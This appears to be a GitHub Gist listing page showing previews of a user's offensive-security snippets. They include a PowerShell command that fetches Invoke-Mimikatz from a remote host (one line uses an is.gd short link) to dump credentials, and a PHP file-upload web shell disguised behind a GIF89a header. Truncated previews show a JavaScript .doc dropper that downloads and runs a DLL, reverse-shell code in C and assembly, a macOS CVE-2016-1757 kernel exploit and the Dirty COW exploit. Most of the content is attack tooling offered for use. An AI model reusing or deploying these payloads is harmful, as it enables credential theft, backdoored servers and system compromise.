
@ivanvza
ivanvza / mk.ps1.txt
Last active August 8, 2022 23:21
Mimikatz memory run
powershell "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<mimikatz location>'); Invoke-Mimikatz -DumpCreds"
---
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
ivanvza / Jquery_upload_inject.txt
Created February 28, 2017 20:33
Jquery Upload
Some sites make use of a file upload feature.
This has happened to me where I know about the upload, but for whatever reason I cannot access/execute it.
So by knowing the upload path, example: scripts/upload.php, I can just add the below HTML (e.g. via burpsuite) when the server responds with the HTML.
<link href="http://hayageek.github.io/jQuery-Upload-File/4.0.10/uploadfile.css" rel="stylesheet">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script src="http://hayageek.github.io/jQuery-Upload-File/4.0.10/jquery.uploadfile.min.js">
</script>
ivanvza / GIF_PHP_backdoor.gif
Created February 28, 2017 20:32
GIF PHP Backdoor
GIF89aü%÷€€€€€€€€€€€
<center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></center>
<?php if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Done !!'; } else { echo 'Failed :('; }}
echo "<center><br><b>".php_uname()."</b><br></center>";
echo "<center><p><br><b>".getcwd()."</b><br></p></center>";
?>
ivanvza / RevShell1434.nasm
Created February 28, 2017 20:31
Rev Shell Assembly.
;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
ivanvza / javascript_dropper.doc.js
Created February 28, 2017 20:30
Simple JS exploit used in the old .doc style
urls = ["http://<IP HERE>"]
var wscript = WScript["CreateObject"]("WScript.Shell");
var wscript_env = wscript.ExpandEnvironmentStrings("%T" + "EMP%/");
var dll = wscript_env + "jEiwaeU3NSUv";
var dll_filename = dll + ".d" + "ll";
var system_arch = wscript.Environment("System");
if (system_arch("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64") {
var rundll_arch_patch = wscript.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");
ivanvza / task_nicely_t.c
Last active February 28, 2017 20:37
task_t CVE 2016-1757 Mac OSX
// clang -O3 -o task_nicely_t task_nicely_t.c
/*
task_t considered harmful
TL;DR
you cannot hold or use a task struct pointer and expect the euid of that task to stay the same.
Many many places in the kernel do this and there are a great many very exploitable bugs as a result.
********
ivanvza / nrs_test.c
Created February 28, 2017 20:26
Reverse shell for 32 and 64-bit Linux
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/mman.h>
ivanvza / httpget.c
Created February 28, 2017 20:24
Simple HTTP GET in C
#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
int create_tcp_socket();
char *get_ip(char *host);
char *build_get_query(char *host, char *page);
void usage();
ivanvza / getenvaddr.c
Created February 28, 2017 20:24
Get Environment Variable Mem Address
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// USAGE:
// ~$ export PWN='echo 1'
// ~$ ./getenvaddr PWN ./pwnme
// PWN will be at 0xbfffff7d
int main(int argc, char *argv[]) {
ivanvza / dirtyc0w.c
Last active February 28, 2017 20:29
Dirtycow
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -lpthread dirtyc0w.c -o dirtyc0w